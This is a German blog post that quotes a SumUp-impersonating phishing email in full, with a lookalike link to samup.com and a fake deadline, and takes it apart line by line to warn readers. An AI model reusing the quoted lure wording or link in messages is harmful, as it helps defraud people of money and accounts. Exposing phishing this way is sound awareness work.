Das PayPal-Konto gehört jetzt einer Betrügerbande. Man ist ausgesperrt. Zugeordnete Bankkonten und Kreditkarten werden schnell, gierig und hemmungslos leergeräumt. Mit dem gephishten Konto machen die Betrüger zudem Betrugsgeschäfte aller Art. Das alles geht verblüffend schnell, denn die Bande ist gut eingespielt. Dafür hat man als ihr Opfer jahrelangen Ärger, wenn man zum Ziel der Ermittlungen wegen Geldwäsche, gewerbsmäßigem Betrug und vielem mehr wird, und zwar beinahe auf der ganzen Welt.
Der Schaden, den einem niemand ersetzen wird, liegt oft in hoher fünfstelliger bis niedriger sechsstelliger Höhe. Zudem hat man einen Eintrag als unzuverlässiger Schuldner bei diversen Auskunfteien, was weitere Probleme mit sich bringen kann, bis hin zu Problemen, wenn man eine Wohnung anmieten, ein Auto leasen oder eine Ratenzahlung machen möchte. Schulden und Jahre vergällter Lebenszeit sind die Folge des leichtgläubigen Klicks in die Spam.
Die Betrüger kaufen sich dicke Autos, machen sich ein schönes Leben und prassen im Puff.

Und deshalb klickt man nicht in E-Mail. Darauf, dass eine Warnung der Mailsoftware immer funktioniert, würde ich mich nicht verlassen wollen. Die meisten Menschen nutzen noch nicht einmal eine halbwegs gute Mailsoftware, sondern erledigen ihre E-Mail mit einem Webmailer im Browser.

Wichtiger Hinweis: Ihre Identifizierung ist noch nicht abgeschlossen

Montag, 8. September 2025

Achtung! Diese Mail ist eine Spam. Sie kommt nicht von SumUp. Es ist ein Trickbetrug. Es ist Phishing. Nicht darauf reinfallen! ⚠️

Von: Sumup <postmaster@7602044ce6.nxcli.io>

Kenne ich nicht. Absenderadressen mit postmaster sind immer höchst verdächtig. Niemand, der noch für einen Cent Verstand hat, würde für seinen gewöhnlichen Mailverkehr eine postmaster-Adresse benutzen. Vermutlich nicht einmal ein Werber, und die haben oft schon sehr dumme Ideen.

Übrigens firmiert das „Sumup“ aus dem Absender als „SumUp“, also mit Binnenmajuskel. Kein Unternehmen würde seine eigene Firmierung im Mailverkehr mit Kunden falsch schreiben. Nicht einmal die kleinste Klitsche. Ein Zahlungsdienstleister erst recht nicht.

SumUp Logo, tech companies, png | PNGWing

Schön, das ist der ALT-Text des Bildes, denn ich lasse mir in E-Mails keine Bilder anzeigen. Ein toller ALT-Text, der dem Empfänger gleich verrät, woher das Bild stammt. Ich vermute mal, dass SumUp in seinen echten Mails einen besseren ALT-Text verwenden würde, aber Spammer geben sich nicht so gern Mühe. Wenn Spammer sich Mühe geben wollten, könnten sie ja gleich arbeiten gehen. Menschen mit unsicher konfigurierter Mailsoftware sehen das als Data-URL in der HTML-formatierten Mail hinterlegte Bild allerdings so:

Der reingefummelte rote Schriftzug „Spam“ ist natürlich von mir. Ich werde nicht so gern Bildhoster für Verbrecher und Spammer. Und die Klitsche, zu der dieses Logo gehört, kenne ich nicht. Aber ich akzeptiere beim Betteln ja auch keine Kreditkarten. Mir reichen Münzen. 🤭️

Sehr geehrter Kunde, sehr geehrte Kundin,

Eines der Geschlechter stimmt. Kundy bin ich trotzdem nicht.

Kürzlich haben wir Sie gebeten, sich online zu identifizieren. Leider haben wir Ihre Identifizierung bisher nicht erhalten.

Da das Archiv meines Posteingangs sehr lange zurückgeht, kann ich ganz sicher sagen, dass ich in den letzten siebzehn Jahren nicht von dieser Klitsche um irgendetwas „gebeten“ wurde. Es kann allerdings sein, dass SumUp schon früher in einer Spam vorkam. Spam hebe ich nicht auf.

Ohne eine abgeschlossene Identifizierung können Sie ab dem 09. September keinen Zugriff mehr auf die Online-Banking-Dienste erhalten. Für die Identifizierung benötigen Sie die Referenznummer dieser E-Mail.

Ihre Referenznummer lautet: 682261.

Bitte beachten Sie, dass dieser Code 24 Stunden gültig ist.

Hui, die „Gültigkeit“ reicht ja gerade für die sittenwidrig kurze Frist. Die Formulierung würde, wenn sie wirklich von SumUp stammte, übrigens eine Strafanzeige wegen Nötigung rechtfertigen. Aber diese Mail kommt nicht von SumUp. Es ist eine Spam. SumUp würde für den Link sicherlich auch…

Greifen Sie online zu unter: https://samup.com/update/id=9003615411

…seine richtige Domain verwenden, unter der auch die Website von SumUp verfügbar ist.

Das Wort „online“ kommt übrigens nur in Spam, Reklame und Kommunikationsversuchen von Vollidioten vor. Es ist ein klares und zuverlässiges Spammerkmal. Denkende und fühlende Menschen, deren Kommunikation einen Wert hat, müssen nicht mit einem dummen Blähwort betonen, dass etwas in diesem Internet irgendwie „online“ ist, und sie tun das auch niemals. „Online“ ist ein genau so sicheres Spamerkennungsmerkmal wie die vielen Varianten von „Click here“.

Die Phishing-Site unter samup (punkt) com ist inzwischen verschwunden. Einerseits ist es gut, das nicht noch mehr Schaden entsteht, aber andererseits ist es für mich ein bisschen schade. Ich mache doch so gern Screenshots von Phishing-Websites. Die sehen in der Regel aus wie die gewohnten Websites, und wenn man nach einen Klick in eine E-Mail das tut…

1. Geben Sie die angeforderten Informationen ein.
2. Führen Sie die SMS-Verifizierung durch.
3. Identifizierung abgeschlossen.

…was die Trickbetrüger gern hätten und wozu sie merkwürdig klartönig auffordern, dann wird das zugehörige Nutzerkonto übernommen und man hat einen großen Schaden. Es ist mindestens eine Menge Geld weg. Richtig schlimm wird es, wenn mithilfe dieses Nutzerkontos auch noch weitere betrügerische Geschäfte gemacht werden und deshalb die Reputation unheilbar den Bach runtergeht. 🚽️

Zum Glück für uns alle gibt es ein sehr einfaches und wirksames Mittel gegen Phishing, was immer noch eine der häufigsten Formen des Trickbetrugs im Internet ist: Niemals in eine E-Mail klicken! Dann kann einem nämlich kein Betrüger so leicht einen giftigen Link unterschieben. Stattdessen im Webbrowser Lesezeichen für Websites anlegen, bei denen man ein Benutzerkonto hat, und diese Websites immer nur über dieses Lesezeichen aufrufen. Wenn man sich nach dem Empfang dieser Spam unsicher sein sollte, ob die Mail nicht vielleicht doch echt ist, einfach die Website von SumUp über das Lesezeichen im Browser aufrufen und sich dort wie gewohnt anmelden. Wenn man dabei keinen Hinweis auf das in der Mail behauptete Problem sieht, hat man nicht nur einen dieser gefürchteten „Cyberangriffe“ abgewehrt, sondern auch sein Geld und seine Reputation gerettet. So einfach geht das. Macht das! 🛡️

Sollen die Trickbetrüger doch verhungern!

Vom Sumup-Team

Ganz sicher nicht.

Bitte antworten Sie nicht auf diese E-Mail. Bei Fragen zu Ihrem Konto kontaktieren Sie uns bitte unter der Nummer 133 464. Dies ist eine automatische Nachricht.

Ist das die ICQ-Nummer? Kennt noch jemand ICQ? Eine Telefonnummer kann es ja nicht sein, denn die hätte wohl eine Vorwahl und vermutlich noch einen Ländercode. 😅️

© Sumup 2025

Keine dumme Spam ist vollständig, ohne dass der Spammer zum Abschluss das „geistige Eigentum“ auf einen 08/15-Text proklamiert, der nicht einmal in die Nähe solcher Dinge wie Schöpfungshöhe kommt. Ich sehe diesen rechtsmissbräuchlichen, dummen und juristisch völlig wirkungslosen Einschüchterungsversuch für den Empfänger übrigens auch regelmäßig bei echten Mails von Unternehmen, die vermutlich gar nicht als Witz gemeint sind, sondern ernst genommen werden wollen. Mit solchem Gefuchtel mit der Narrenkappe machen die es mir immer sehr schwer, sie noch ernst zu nehmen. Ganz schön doof.

Aber hey, verklag mich doch für mein Vollzitat! 🖕️